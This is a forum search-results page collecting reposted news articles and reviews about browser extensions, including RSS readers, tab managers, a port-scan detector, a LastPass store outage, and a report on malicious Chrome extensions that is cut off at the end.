Jump to content

Search the Community

Showing results for tags 'extension'.



More search options

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Site Related
    • News & Updates
    • Site / Forum Feedback
    • Member Introduction
  • News
    • General News
    • FileSharing News
    • Mobile News
    • Software News
    • Security & Privacy News
    • Technology News
  • Downloads
    • nsane.down
  • General Discussions & Support
    • Filesharing Chat
    • Security & Privacy Center
    • Software Chat
    • Mobile Mania
    • Technology Talk
    • Entertainment Exchange
    • Guides & Tutorials
  • Off-Topic Chat
    • The Chat Bar
    • Jokes & Funny Stuff
    • Polling Station

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Found 27 results

  1. Yet another speed dial is an simple, customizable new tab replacement extension for Firefox and Chrome Yet another speed dial! No, I'm not complaining about anything. That's the name of a speed dial extension for Firefox and Chrome. The add-on is meant to replicate Opera browser's famous feature, and it does so rather nicely. Once installed, Yet another speed dial takes over the new tab. The add-on starts with a blank page, and displays some steps to help you get started. Add speed dials The easiest way to add speed dials is to visit any web page and right-click on it and select "Add to Speed Dial" from the context menu. The extension saves a thumbnail screenshot of the page to be used for the dial. The second method is to click on the new tab button, and then on the large + button to add a new site. Paste the URL of the website to be added in the text field, and click on "Add to Speed Dial". The add-on opens a new tab to load the site to save its thumbnail. Another way to add dials is by bookmarking a page and placing it in the Other Bookmarks > Speed Dial folder. This also ensures your bookmarks are synced with your Firefox/Google account. Rearrange the position of a dial by dragging it to a different place. Right-click on a dial to open it in a new tab, new window or private window. It can also be used to delete a dial. You may edit a dial's settings including the URL and the image, the extension lets you choose between the web page thumbnail or the favicon, or you can use a custom image from your computer. Settings Right-click anywhere on a new tab, or click on the gear icon in the top right corner of the add-on's page to access its settings. Yet another speed dial lets you use your own wallpaper as the background. Prefer a solid color instead, you can customize that too. Don't like the label (title) displayed below every dial, toggle the setting. The + button (Add side) can be disabled as well. The last option on the settings page sets the dials to be vertically aligned on the screen. Hit the save button to apply the changes that you've made. Incompatibility with Firefox Containers Yet another speed dial worked well with Chrome (Microsoft Edge Chromium), but I had some trouble with the extension on Firefox. It wouldn't capture the images for the dial, or even add the dial when I used the right-click menu. The issues page on the add-on's GitHub didn't have any reports related to this. I had almost given up on the add-on thinking it was broken, and if there hadn't been a Chrome extension, I certainly would've. That's what made me curious, why it would work in one browser but not in the other. I disabled some of my other add-ons in Firefox to narrow down the issue. Eventually, I found the answer. It appears the extension is not compatible with Firefox Containers. When I tried to add a dial for a web page that is configured to load in a container, the extension would not finish capturing the images. Also, the right-click menu was non-responsive when used with contained websites. For e.g. I've set Ghacks, Reddit, Google (Gmail, Docs, etc.,) to load in their own Firefox Containers. When I tried to add these pages to the dials, only one of these worked (Google.com). Even Google's sub-domains like Gmail and YouTube couldn't be added. This wasn't the case for web pages that were loaded normally (no containers). For e.g. Yahoo, GitHub, SourceForge, etc. The extension's "Add to dial menu" and + button worked perfectly with normal pages. To put this theory to the test, all I had to do was disable the Firefox Multi-Account Containers add-on, and then try adding the web pages using Yet another speed dial. It worked. You may want to use this as a temporary workaround, but I won't recommend disabling containers permanently, because Privacy & Security > convenience anyday. Yet another speed dial is an open source extension. Download it for Chrome or Firefox. It does not sync to any cloud service, which is a good thing. There are no way to organize dials in folders, and the lack of an option to backup your dials is a bit disappointing as well, since there's no way to restore dials in case you reset Firefox (or Chrome). Landing Page: https://github.com/conceptualspace/yet-another-speed-dial Yet another speed dial is an simple, customizable new tab replacement extension for Firefox and Chrome
  2. Behave for Chrome and Firefox warns you of port scans and local attacks Behave! is a new browser extension for Google Chrome and Mozilla Firefox that is designed to inform its users when sites misbehave by performing port scans or access private IP addresses. The extension may also work in other Chromium-based and Firefox-based browsers but I have not tested that. Behave! should not be confused with the Firefox extension behind!, which we reviewed yesterday. The new extension reveals when sites scan local ports or access private IPs. We revealed in May 2020 that eBay and other major sites were running port scans on user systems as soon as the browser connected to these sites. The sites checked ports used by local remote software and used for fraud detection as remote software may be used for that purpose. Users on the other hand voiced concern that the port scanning was unethical and an invasion of privacy. The browser extension Behave! monitors web pages for certain activity, and informs the user if it notices it. One of the main features of the extension is that it detects port scanning and will reveal as much immediately. The extension adds an icon to the toolbar of the browser and changes the color of the icon based on its findings. A click on the icon displays information about the activity of sites in the browser sorted by method. For IP access, Behave! lists the target IP and port, target host, and the host the request originated from. For Port scans, it lists the port, host, and the from host. For Rebinding scans, it lists the hosts, IPs and from host. Behave! detects browser based port scans, access to private IPs, and DNS rebinding attacks to private IPS. The extension comes with a basic set of preferences that let you change the portscan threshold, enable or disable the monitoring, and to enable or disable Windows notifications. The open source extension is developed by Stefano Di Paola, the co-founder and CTO of MindedSecurity. Technically speaking, Behave! "will alert if a web page tries to directly access [...] an IP belonging to any of the following blocks": Loopback addresses IPv4 127.0.0.1/8 Loopback addresses IPv6 ::1/128 Private Networks IPv4 10.0.0.0/8 - 172.16.0.0/12 - 192.168.0.0/16 Unique Local Addresses IPv6 fc00::/7 Closing Words Behave! notifies users if sites misbehave or if DNS rebinding attacks are performed. The extension comes without any options to block the site behavior. The developer plans to introduce new features in future versions of the extension. Plans are underway to integrate a whitelist in the application and an option to "track back the code performing the suspicious activity". Landing Page: https://github.com/mindedsecurity/behave Behave for Chrome and Firefox warns you of port scans and local attacks
  3. This Chrome extension lets you link directly to specific text on a webpage Google has released Link to Text Fragment, a new extension, that lets users generate URLs to a specific text on a webpage, irrespective of the page's formatting. After the extension has been installed, highlight that text that you want to link to, simply right-click, and select "Copy Link to Selected Text." If the process succeeds, the selected text will briefly be highlighted in yellow. Anyone having a compatible browser can open and share this link. This extension builds upon Text Fragments, a feature that was recently added to Chromium. It works by appending extra information to a URL after a # and is the same technology that the Mountain View firm uses to highlight featured snippet text within webpages. However, this process can be a bit difficult, especially when users are linking to longer sections of text or complex pages. This extension makes the creation process convenient. The extension-created links are compatible with version 80 upwards of all Chromium-based browsers, but all browsers haven't adapted yet. As of yesterday, Google's blog post notes that Firefox and Safari had not stated whether or not they'd implement this feature. This Chrome extension lets you link directly to specific text on a webpage
  4. Drop Feeds is an RSS reader extension for Firefox RSS Feeds are a simple way to keep yourself updated of the latest articles from your favorite sites. Some prefer desktop programs like QuiteRSS, while others prefer a web-based service. A good browser extension can offer the best of both worlds, that's what Drop Feeds does. The extension supports RSS and Atom feeds. Once you have installed the extension, click on its button on the toolbar. Drop Feeds has a three-pane sidebar, and a reader pane taking up the rest of the space. Adding Feeds So, how do you subscribe to feeds? Visit any website that has an RSS feed. Click on the Drop Feeds button. There are three ways to add feeds: the first method is to click on the Discover Feeds button (magnifying glass icon) on the sidebar, it lists all available feeds, including comment feeds. Select the one you want to subscribe to, the extension loads a preview of the feed in a pop-up window. Click on add feed to subscribe to it. The second method is quite similar, after clicking the Drop Feeds button, you should notice an RSS icon in the address bar. Click on it to view the feeds detected by the extension, pick one and subscribe to it. For some reason, only the 2nd method worked with our blog's feed. The way this works kind of reminds me of the Want My RSS extension, but Drop Feeds comes with its own reader, so that's a nice bonus. If you'd rather use a URL for adding a feed, click on the "Options" button in the top pane (last icon on the toolbar), and select "Subscribe by URL". Paste the RSS Feed link in the box and select subscribe. Now that you've subscribed to a feed, it should appear in the top pane of the sidebar. A bold feed name indicates that it contains unread articles. Click on a feed and the add-on opens it a new tab to load the latest articles, in the large pane to the right. This is a proper RSS reader, complete with images and clickable links. You can close the Drop Feeds sidebar to read the current feed in the browser. Selecting a different feed loads it in a new tab. The middle pane in the sidebar lists all available articles from the current feed, and bold titles indicate unread articles. When you click on an article, a text-only version of it is loaded in the third pane. While it's useful for previewing a post, it's not very reader-friendly. Managing Feeds The first icon on the top pane's toolbar refreshes all feeds. The second, as we saw earlier, discovers feeds from the current web page. View updated feeds using the 3rd button. Subscribe or filter the feeds with the fourth and fifth icons. Right-click on a feed to manage it. You can use this context menu to create different folders, mark a feed as read/unread, delete it. The info option lets you rename the feed or change its address. Similarly, the article list (the second pane) has options to mark posts as read, unread, it also allows you to open unread articles in new tabs and hide the ones you've read. Drop Feeds Options The extension's options page has quite a few settings that you can toggle. Drop Feeds stores your feeds in its own bookmarks folder which you can customize. Define the update checker settings, new tab behaviour (for opening feeds), switch to various themes including a dark theme. If you're coming from a feedreader service or application, you can export the OPML (list of subscribed feeds) and import it to Drop Feeds. The extension has an option for exporting its own OPML file. Advanced users may set up security filters to prevent HTML and CSS elements from loading in feeds. The add-on comes with a script manager which you can use to add custom scripts for the feeds. The add-on is open source. According to the extension's page, Drop Feeds was inspired by the legacy add-ons, Sage feed reader and Sage++. Drop Feeds is an RSS reader extension for Firefox
  5. Get RSS feed URLs from any page and preview them using the Want My RSS extension for Firefox When you are on a website, and want to see if it offers an RSS feed that you may want to subscribe to, what do you do? Usually the best way is to look for the RSS icon on the page. IF there is none, you could check the source or try common feed URLs direclty, e.g. by appending /feed/ to to the domain. https://www.ghacks.net/wp-content/uploads/2020/05/Want-My-RSS-icon.jpg Want my RSS is a Firefox extension that aims to simplify this task. Install the add-on and visit any web page. You'll notice an RSS icon (next to the bookmark icon) in the address bar. Click on the icon and a small pop-up appears, that lists the available RSS feeds. Mouse over the RSS feed that you want to access. Left-click on it and Want My RSS will open load the page in its feed previewer. Another way to do this is to click the RSS Feed URL on the website, or simply open the feed's link, it will be loaded in the extension's previewer. Use it to read the latest articles on the website. This includes the images that were included in the posts, but videos aren't displayed in the previewer. Click on an article's title/URL to load it normally. By default, the add-on uses "Relative time" (like an hour ago) to indicate when an article was published in the feed that you're viewing. Uncheck the box next to "Relative time" to view the exact time stamp when the post was published to the feed. Use the sort box near the top corner in the feed previewer to sort the articles by Newest or Oldest. See that icon to the right of the articles? Click on it to switch to the day or night theme, which changes the background color of the Want My RSS previewer page. Do note that this isn't a full-fledged RSS reader extension by any means (for starters it lacks notifications). You may want to try something like Smart RSS or Feedbro for a proper feed reader. Or, click on the icon next to the Subscribe button to choose from a list of feed readers: Feedly, The Old Reader, InoReader, News Blur, Netvibes, BazQux, Feedbin, G2Reader, CommaFeed, Nooshub. If you don't use any of those, scroll to the top of the preview page. The add-on displays the name and the link of the RSS feed in the top left corner. Mouse over near the URL to view the URL and copy it. Now, you can use it to subscribe to the feed in any feed reader of your choice. The add-on doesn't work perfectly with all sites. E.g. For some reason, it doesn't pick up gHacks' feed, i.e. the Want My RSS button doesn't appear in the address bar. Another thing that I observed was the "Subscribe to page" option that appears when clicking on the three-dot icon in the address-bar. The option was grayed out. However, clicking on the blog's feed button loaded it in the previewer. I also noticed an issue with some websites where the extension would not load the preview (for e.g. the European PlayStation blog). Other options Open the add-on's page to define the rules for custom feeds. If you don't want the extension to load the preview of feeds, disable the "Intercept requests" option. Toggle the "open popup feeds in a new tab" option to force Want My RSS to load a feed in a new tab. It's useful when you don't want to navigate away from the source website. Want My RSS is an open source extension. Landing Page: https://addons.mozilla.org/en-US/firefox/addon/want-my-rss/ Source: Get RSS feed URLs from any page and preview them using the Want My RSS extension for Firefox (gHacks - Ashwin)
  6. IndicateTLS highlights TLS security protocol version in Firefox's address bar IndicateTLS is a browser extension for the Firefox web browser that highlights the security protocol that a website uses in the Firefox address bar. Additionally, it provides detailed security information about certain security features and the protocol. If you see HTTPS in the Firefox address bar you know that the connection to the site is encrypted. While that is good, it is not clear immediately which protocol version browser and site negotiated for the connection. Browser makers like Mozilla have plans to drop support for old security protocols, TLS 1.0 and TLS 1.1 in particular; the deprecation has been delayed due to Coronavirus but TLS 1.2 and 1.3 will become the standard protocols for all sites going forward. Browsers don't show whether a connection uses TLS 1.2 or 1.3 by default. As a Firefox user, you may right-click on the page, select Page Info and switch to the Security tab to see the technical details of the connection. These include which security protocol version is used. The Firefox add-on IndicateTLS brings the information to the forefront. The extension displays the version of the protocol in the Firefox address bar next to the bookmarks icon. There you find listed the version, e.g. 1.2 as in the example screenshot above. A click on the icon displays technical details. These include at the time of writing: The protocol that is used. The connection state, e.g. secure. The cipher suite. Whether Forward Secrecy is enabled. Whether HSTS preload is enabled. Information about the certificate. Switch to the resources tab in the interface to display information about loaded resources and technical details for each. Links to the SSL testing site SSL Labs are provided to run additional tests and get more information about the status of a connection. Closing Words IndicateTLS is a useful extension for Firefox as it highlights the protocol version of the connection in the address bar. Developers benefit from the extension the most as they may use it to check sites and make sure everything is configured correctly. Regular users may find it useful as well as it provides more information on the status of the connection than Firefox in its frontend. Landing Page: https://addons.mozilla.org/firefox/addon/indicatetls/ Source: IndicateTLS highlights TLS security protocol version in Firefox's address bar (gHacks - Martin Brinkmann)
  7. Momentum adds Microsoft To Do integration to its extension Momentum is announcing today that the extension now supports Microsoft To Do in its list of app integrations. The Redmond giant’s offering now joins the likes of Trello, Todoist, Github, Google Tasks, and more. The extension currently supports Wunderlist but warns users of the impending shut down of the Microsoft-acquired to-do list app on May 6, 2020. For those not aware, Momentum is a nifty extension on Chrome, Edge, and Firefox that replaces the browser’s new tab page with an image, weather information, and content from the integrated apps supported by the extension. The integration with Microsoft To Do means that the extension will now support all the app actions such as adding, editing, and completing tasks. Users can also sift through their lists right from the integration on the homepage. This is particularly useful for those that use their browsers extensively since there will be one less app to switch to. However, the makers of the extension do caution users that some To Do features, such as the ‘My Day’ list or recurring tasks currently do not work with the extension. These shortcomings seem to exist due to some “limitations” in Microsoft’s API for the app, the company says. The firm adds that it is “optimistic that Microsoft will update their API soon”. It must be noted, however, that integrations are available only for paid ‘Momentum Plus’ users. Users of Wunderlist that use Momentum can head here for steps on how to switch to To Do. You can try out Momentum on Google Chrome, Microsoft Edge, or Mozilla Firefox from their respective extensions and add-on stores, respectively. Source: Momentum adds Microsoft To Do integration to its extension (Neowin)
  8. automaticDark is a Firefox extension that can switch to dark theme automatically on a schedule Firefox has a really cool native dark theme. You're probably aware of this, but in case you don't know, you can switch to it from the add-ons page: select the themes option on the side bar and click on the Dark theme. This process has to be done manually every time you want to switch between themes. Windows 10 has a night mode that can be enabled automatically, and when this option's enabled, Firefox will enable the dark theme on its own, and reverts to the default theme when the operating system turns off night mode. But not everyone uses Windows 10. If you're on a different operating system, and want your browser to switch to a dark mode on a schedule, you can use an add-on called automaticDark. You may also find the add-on useful if you want to enable and disable the dark theme on a custom schedule. The extension doesn't have a toolbar icon which means that you need to head to the add-ons page to manage it. The options page lets you set the dark theme at sunset, and switches back to the daytime theme at sunrise. The default options for sunrise and sunset are set to 8:00 AM and 8:00 PM. You can change the time manually, like I've done. That's a pretty useful option to have, since not everyone works during the same hours of the day. There is an option to automatically set the sunrise/sunset time, but if you enable it, you'll be prompted to grant the geo-location permission for the add-on. There are two more options on the page: these allow you to set the daytime theme and the nighttime theme. You can choose from any of the three default themes that Firefox ships with: Default, Light and Dark. If you're a night shift worker and prefer using the day theme during the night (and vice versa), you can switch them per your requirement. Once you have set the sunset and sunrise times, automaticDark will enable the corresponding theme automatically. I've been using it for about a week, and it has worked flawlessly. The extension does not change the appearance of websites, i.e., it will not change a page's background to a dark color. If you want that, you should try Dark Reader. Custom themes support I don't like the built-in themes in Firefox, so I use third-party themes. Will automaticDark work with it? Absolutely, as long as the theme that you're using is listed in the Add-ons > themes section (and not under Extensions), it should work. The easiest way to check this is right from automaticDark's options page, just click the daytime or nighttime theme setting, and the third party theme that you want to use should be available in the drop-down menu. Set it as the theme, and you are good to go. On the other hand, I found that extensions which change the appearance of the browser like NightOwl, Firefox Color aren't supported. This isn't automaticDark's fault, it's just that these add-ons use a different method (modified CSS) to change the look of the browser. automaticDark is an open source extension. The full name of the extension is automaticDark - Time-Based Theme Changer. This is a useful add-on, even for those on Windows 10. Landing Page: https://addons.mozilla.org/en-US/firefox/addon/automatic-dark/ Source: automaticDark is a Firefox extension that can switch to dark theme automatically on a schedule (gHacks - Ashwin)
  9. Smart RSS Reader is a feed reader extension for Firefox and Chrome Web based feed readers are kind of a pain to use. They often implement changes that you don't want, while taking away features that you like. Local readers are much better when it comes to this, because you can revert to an older version in case of adverse changes. Smart RSS Reader is a feed reader extension for Firefox and Chrome that I have been using for a week; I'm quite impressed by it so far. Install the add-on and click its toolbar icon to open a new tab with the extension's RSS reader. It has three panes, each of which has a toolbar at the top. The left pane is the feeds pane and lists all RSS feeds that you're subscribed too. Selecting a feed displays the title of the articles published by the site in the center pane. It also displays the author's name and the date when the article went live. Click on an article's title to open it in the browser view, aka the right pane. Smart RSS Reader displays the article in its native format (i.e. no misaligned text or items) and it contains the images included in the post too. Use the Pin icon in the top right corner of an article's page to favorite it. Smart RSS Reader supports offline article reading which is useful when you're away from an internet connection. The extension's toolbar icon flashes a badge when a new article has been published, so you won't miss out on reading your favorite sites. Adding RSS Feeds The toolbar on the top of the Feeds pane has a plus button. Clicking it brings up a box where you can enter an RSS Feed's URL. For e.g. http://www.ghacks.net/feed/ The extension automatically picks-up the name of the website, its favicon and you'll immediately see the list of articles available for reading. Another way to add a feed is by right-clicking on the extension's toolbar icon. This context menu is useful for subscribing to the RSS feed of the website that you're currently on. This doesn't work for every site though, it needs to have an RSS or XML feed available which the add-on pulls automatically. If you're subscribed to a lot of feeds already, don't worry you don't need to waste time re-adding each of those to Smart RSS Reader. Click on the wrench icon in the top right corner to go to the options page, scroll down to the Import section and select the OPML > browse button to pick your OPML file. The feeds are imported instantly, and the add-on preserves the folders that you have set in your previous RSS reader. Managing Feeds Right-click on the "All feeds" option to view a context menu which allows you to "Update all, Mark all read, and Delete all articles". Select a Feed and right-click on it, click on Properties to change the URL, name etc. Use the "New Folder" option in the Feeds pane's toolbar to create a new folder, and move RSS feeds into it. This can help you organize things. Each feed has its own context menu that has options to update the list of articles, mark all as read, delete (unsubscribe), refetch (redownload), Openhome (opens the feed's website). The feeds list pane has yet another context menu. This one can be used to jump to the next unread, previous unread articles, or to mark articles as unread, mark and next/previous as unread, unpin articles, and to open the article in a new tab. The toolbar at the top of this pane has three icons: mark all read, update, delete. The Search box is handy to search for a particular article in your feeds. Smart RSS Reader options The extension has a bunch of options including a 2-pane view, sorting options, article font size, reader behavior, export feeds to OPML or SMART (text document), etc. Smart RSS Reader has many keyboard shortcuts that you can use to read and manage your feeds. Get the Firefox extension from the add-ons repository, and the Chrome version from the webstore. According to the developer, the extension is a fork of an add-on made by Martin Kadlec, which was made as an alternative to the built-in RSS reader in Opera 12. Smart RSS Reader is an open source extension. The fact that you don't need an online account to manage your feeds, and that everything is stored locally is really nice. Add-ons like this and Feedbro are the closest alternative for desktop readers, though I do use QuiteRSS myself. Smart RSS Reader is very fast and fluid. Landing Page: https://github.com/zakius/Smart-RSS Source: Smart RSS Reader is a feed reader extension for Firefox and Chrome (gHacks)
  10. Simple Tab Groups is a Firefox extension for organizing your tabs Simple Tab Groups is a Firefox extension that can help you organize your tabs. The extension was inspired by one with a similar name, Tab Groups. The extension includes five plugins (add-ons from the same developer) merged into one for a functioning Tab Group manager extension. After you install Simple Tab Groups, it opens a local web page with a screenshot to guide users how to "Enable the restore previous session" option in Firefox. That's because when you restart the browser, the add-on will load the last accessed tab group. You will see that the extension added a button to the toolbar. Click on it to see three options. Create New Group This is the option you will be using the most. Selecting it will prompt you to assign a name, and this creates an empty Tab Group. To add tabs to the group, mouse over to the tab bar and right-click on a tab. Select "Move Tab To Group". This adds the tab to the created group and hides it from view. If you have multiple groups, you'll have the option to select which group you want to move the tabs to. You may also create new groups from the menu. Once saved, a group can be opened anytime. This works in new windows too. Managing Group Settings Let's get back to the Tab Groups' toolbar menu. Now that we have some groups, we can manage them. Right-click on a group's name to view its context-menu. This allows you to open all tabs in a group in a new window, sort the groups alphabetically, export the selected group to bookmarks, and to reload all tabs in the group. You can discard the selected group or all other groups, or delete the group completely. Select the Group Settings. Here you can rename a group, select its icon style. The tab's icon (the website's favicon), can be set as the Group's icon, do this from the tab bar. The Group Settings panel also has options to mute tabs when a group is closed/restored, make a sticky group (tabs are never moved from the group), show/discard tabs after moving. Simple Tab Groups works with Firefox Containers, and can be configured to automatically move specific containers to a particular group. For e.g. If you have a container for shopping websites, and you have created a Tab Group called shopping, it may be a good idea to move the tabs in the Shopping container to the group. The extension also supports RegEx for capturing tabs from the same domain. Add-on Settings The main menu of the add-on has a caret icon, click on it to view other tabs (not part of the group). There are 3 options here all of which perform a single-click action to: close all these tabs, move these tabs to the current group, or create a new group with these tabs. The gear icon in the menu can be used to access the add-on's options. You can customize the open, close, discard behavior of tabs, optionally discard a tab after hiding it or enable a dark theme and more from this screen. The Manage Groups option opens a new tab with a speed-dial like representation of each tab groups, you can right click on a group to manage it. The extension is an open source project. The add-on is compatible with Gesturefy, though it needs a little tinkering to get it working. Note: Simple Tab Groups is NOT a session manager. If you have many tabs in a group and close it before exiting other windows, you will lose the tabs. To prevent this, you should close all the other windows first. I recommend using the Bookmarks option. You can also use OneTab, which does save a history of the tabs and has a restore option. Simple Tab Groups provides an easy way to de-clutter your browser and organize your tabs. It does not interfere with the new tab page, so add-ons like Group Speed Dial work alongside perfectly. Landing Page: https://addons.mozilla.org/en-US/firefox/addon/simple-tab-groups/ Source: Simple Tab Groups is a Firefox extension for organizing your tabs (gHacks)
  11. An accidental outage was caused by LastPass yesterday by mistakenly removing the LastPass extension from the Chrome Web Store, leading to users seeing 404 errors when trying to download and install it on their devices. "The LastPass extension in the Chrome Web Store was accidentally removed by us and we are working with the Google team to restore it ASAP," LastPass Support today said in an update on Twitter. "You can still access your Vault by signing in on our website." The LastPass extension's Chrome Web Store entry is still inaccessible, with users who try to access it still being instead served with 404 errors. Error seen when accessing the LastPass extension Chrome Store entry Yesterday's LastPass issues started with users reporting that they can't download the LastPass Chrome Extension and the company acknowledging the issue on the status website. "The Network Operations Center is investigating reports that Chrome users are experiencing 404 errors when downloading the LastPass Chrome Extension," the incident's initial description reads. LastPass also advised users in a subsequent update, published one hour later, to use the Web Vault or the Mobile App, or even use LastPass with another browser of their choice until the problem is found and fixed. Four hours later, the issue behind the extension download problems was identified, with the company blaming it on the accidental removing of the LastPass Chrome Extension from Google's Chrome Web Store. While the unexpected and accidental remove led to hundreds if not thousands of reports from users, the ones who already had the extension installed were not affected by this incident. As previously mentioned, LastPass' Chrome extension is not available in the store and users are advised to access their Vault by signing in on the LastPass website. While some users feared that this outage was a sign of a security incident, LastPass Support said on Twitter that this is not the case and users wouldn't have to worry about their passwords or personal info getting leaked even if that was the case. "Please note that all encryption and decryption occurs locally on your device, not on our servers," LastPass further explained. "We don’t have access to your sensitive data." Source
  12. Netflix is great. Its interruptions to make sure you're still watching aren't. Netflix loves to serve its binge-watching customers who view a whole season of House of Cards or Daredevil in a matter of days. But Netflix knows how to annoy us bingers, too. The worst is when the streaming service pauses your show every few episodes to ask if you’re still watching. First-world problem? Definitely. Something you’d rather not have to deal with? Absolutely. A new Chrome extension called Flix Assist aims to solve the ‘continue watching’ problem and get rid of that 30-second countdown between episodes. There’s really nothing to this extension. Now, I know I say that a lot, but I really mean it this time. With Flix Assist all you have to do is install it and the extension starts working. There are no settings to turn on or off, you don’t have to sign-in, nothing. Just install it, start watching Netflix and the extension takes care of the rest. Keep in mind that this extension will only affect the performance of Netflix on the desktop. It won’t speed up the 30-second pause between episodes on your smartphone or any another non-Chrome platform. Meaning, horror of horrors, you’ll actually have to tap a button to skip the 30-second intermission. Source: pcworld.com I have got tired of this annoyance from netflix so found this extension for chrome last night. I installed and netflix never bother me all night. Important note would be that if this extension fails to work for you please see your netflix settings>account>test participation and toggle to "off". For some reason if this setting is turned on (which it is by default) it can make the extension no work.
  13. Chrome extensions are very useful pieces of software. They allow users to fix issues in Chrome that the developers do not plan on resolving, add new features to the browser, or increase security as you browse the web. All of these benefits, though, come with a downside. This is an increase in memory, CPU utilization, and potential bugs that may occur due to conflicting extensions. This is where the Extensity Chrome extension comes in. Extensity is an extension manager for Chrome that allows you to easily list, enable, & disable extensions installed in Chrome. Even better, Extensity allows you to configure Profiles that consist of a specific group of enabled and disabled extensions. This way you can create a profile for web development or infosec that contain different groups of enabled/disabled extensions and switch between them as necessary. The memory consumption of Chrome extension Before take a look at Extensity, it is important to understand why this extension is so useful. While extension conflicting with each other do exist and extension icons can quickly take up too much space, the main reason to manage and optimize your Chrome extensions is to reduce the amount of memory Chrome uses. For example, below is an image of the Chrome Task Manager with one browser window and a single tab open to Google.com. This windows shows that Chrome is using about 70 MB of memory. Now I personally have 24 extensions installed in Chrome, with the majority disabled until I need them. To give a dramatic example of what Chrome's memory consumption looks like when all 24 extensions are loaded, you can see the image below. With all of the extensions loaded, Chrome is now using approximate 446 MB with only one Window open to a single tab of Google. As you open more browser windows and more tabs, this memory consumption will increase and begin to use up a large amount of memory. This is where Extensity comes in. How Extensity helps you manager your Chrome extension As you can now see, while extensions add wanted behavior to Chrome, they can quickly use up a lot of your computer's memory. To resolve this, we can use Extensity to only enable extensions when we need them and disable all the rest. To get started, install Extensity from the Chrome Web Store. When Extensity is installed, a new icon will appear in your Chrome toolbar as shown below. Extensity Button If you click on this icon, it will open a list of all the installed extensions and apps. You can then use this list to quickly enable or disable any extension. Extensity Extension List To disable an extension, simply click on it and it will become greyed out to indicate that it is disabled. To enable an extension, simply click on one so it becomes bolded as shown at the top of the list above. It is important to note that when you click on an extension, its status changes immediately and does not require the reboot of Chrome. At the top of Extensity's extension list is a variety of buttons that you can use to perform various quick tasks. Extensity Header Buttons Starting from left to right, is a toggle to quickly enable/disable any currently enabled extensions, a button that opens the Chrome extension list, a button for the Profiles screen, and a button for the options screen. The other three buttons are simply to share the extension on social networks. The options page also allows you to configure various settings on how Extensity operates or displays the extensions. Some of the options I recommend enabling include "Show header at the top", "Group Apps and Extension", "Show Search Box", and "Show enabled Extensions at the top". Extensity Options Page If you click on the Profiles button, you will be brought to a screen where you can create various profiles, or groups, of enabled and disabled extensions. You can use these profiles to make groups of extensions that are commonly used together and pertain to a particular task. For example, you could create a default profile for extensions that you commonly use, another for web development, and another for security research. Extensity Profiles Page You can then quickly use these profiles to switch between sets of enabled extensions. For example, I have a "development" Profile that contains all of the web developer extensions that I use. As I do not use these often, I created a profile that can enable these extensions, and disable the rest, as needed. For example, below is how the Chrome task manager looks with only the extensions enabled that I routinely use. Notice that the memory consumption is much less than if I had all 24 extensions enabled, while still having the other disabled extension accessible if needed. Commonly Used Extensions Enabled Now that you understand how Extensity works, the memory consumption of extensions, and how you can organize extensions into groups that are only enabled when you need them, you can begin to optimize the performance of Chrome Bleepingcomputer.com
  14. You already know to be wary of third-party Android apps, and even to watch your back in the Google Play Store. A flashlight app with only 12 reviews might be hiding some malware as well. But your hyper-vigilant download habits should extend beyond your smartphone. You need to keep an eye on your desktop Chrome extensions as well. These handy little applets give you seamless access to services like Evernote or password managers, or put your Bitmoji just a click away. As with Android apps, though, Chrome extensions can sometimes hide malware or other scourges, even when you install them from the official Chrome Web Store. Google says that malicious extension installs have decreased by roughly 70 percent over the last two and a half years, but a steady stream of recent research findings show that the problem, and risk to users, is far from resolved. “What we’re seeing is an increase in criminal use of extensions,” says William Peteroy, CEO of the security firm Icebrg. “And when we start to see criminal pickup on things it absolutely meets our bar that this is something we need to pay attention to, and something users need to start paying a lot more attention to than they are right now.” Sneak Attacks Other browsers suffer a similar onslaught, but with almost 60 percent market share, attacks on Chrome users will generally affect the largest number of people, making it a prime target for criminal hackers. Icebrg recently highlighted four malicious extensions in the Chrome Web Store that had more than 500,000 downloads combined. The extensions masqueraded as standard utilities, with names like “Stickies” and “Lite Bookmarks.” The researchers saw indications, though, that they were actually part of click-fraud scams to boost revenue for attackers. And the extensions requested enough privileges that they could have snooped even more, accessing things like user data, and tracking their behavior. Google removed the four extensions after Icebrg disclosed them privately. “Since the creation of the extensions platform, we’ve worked hard to keep the extensions ecosystem free from malware and abuse,” says James Wagner, a Chrome product manager at Google. “We're using machine learning to detect malicious behavior in extensions, and … we’ve been particularly focused on cracking down on abusive distribution methods.” In particular, the Chrome team has been working to detect and block situations where websites push users to get an extension, sometimes trapping them in layers of installation pop-ups that try to trick people into installing. In spite of these efforts, though, malicious extension campaigns pop up regularly. Part of the problem: Chrome is already a trusted application. When users give it permission to run certain code, like an extension, their operating system and most antivirus products usually give it a free pass. And the more systems and services move into the browser—like Microsoft 365 and Google’s G Suite—the more valuable data and network access a malicious Chrome extension could potentially get. In addition to distributing malicious apps through mechanisms like phishing and compromised sites, attackers have also refined techniques to smuggle their extensions into the Chrome Web Store, and then modify them remotely once downloaded to add or activate nasty features. In October, Google removed three extensions impersonating AdBlock Plus, one of which had almost 40,000 downloads. That same month, researchers at Morphus Labs discovered an extension, dubbed “Catch-All,” that launched from a phishing attempt targeting WhatsApp users, mimicked an Adobe Acrobat installer, and then captured all the data users entered while browsing in Chrome once installed, including usernames and passwords. In December, researchers at the internet security firm Zscaler found an extension that lifted login credentials, cookies, and financial data from users who visited and logged into Banco do Brasil websites and accounts. And this month, the software security company Malwarebytes published findings about an extension (built for both Chrome and Firefox) called “Tiempo en colombia en vivo” that forced itself to install when users visited compromised web pages and then was deviously difficult to uninstall. Malwarebytes researcher Pieter Arntz said that he couldn’t even completely analyze what the extension’s operations and goals were, because it was coded with extensive obfuscation. Arms Race When hackers put effort into masking the true intent of software, it generally indicates that an arms race is ramping up. Obfuscation and runtime changes are the same techniques attackers use to sneak malicious mobile apps into the Google Play Store and Apple’s App Store. “I think the exposure is huge,” says Jake Williams, a penetration tester and malware analyst who founded Rendition Infosec. “It's trivial for an attacker to get their extension published and then change the behavior dynamically after it's published." The Icebrg researchers who found four malicious extensions downloaded half a million times say that they found the scale of infections worrying. And though Chrome’s improved defenses have clearly worked well enough to motivate new innovations from attackers, this next generation of malicious extensions may prove challenging to contain. “What we saw in our research was that this was undetected and active across a large swath of enterprises,” Icebrg’s Peteroy says. “They’re successful in bypassing Google’s efforts to create security around extensions. And because extensions run at the application layer, running in the browser, it completely bypasses a lot of protections.” The crucial thing you can do to protect yourself 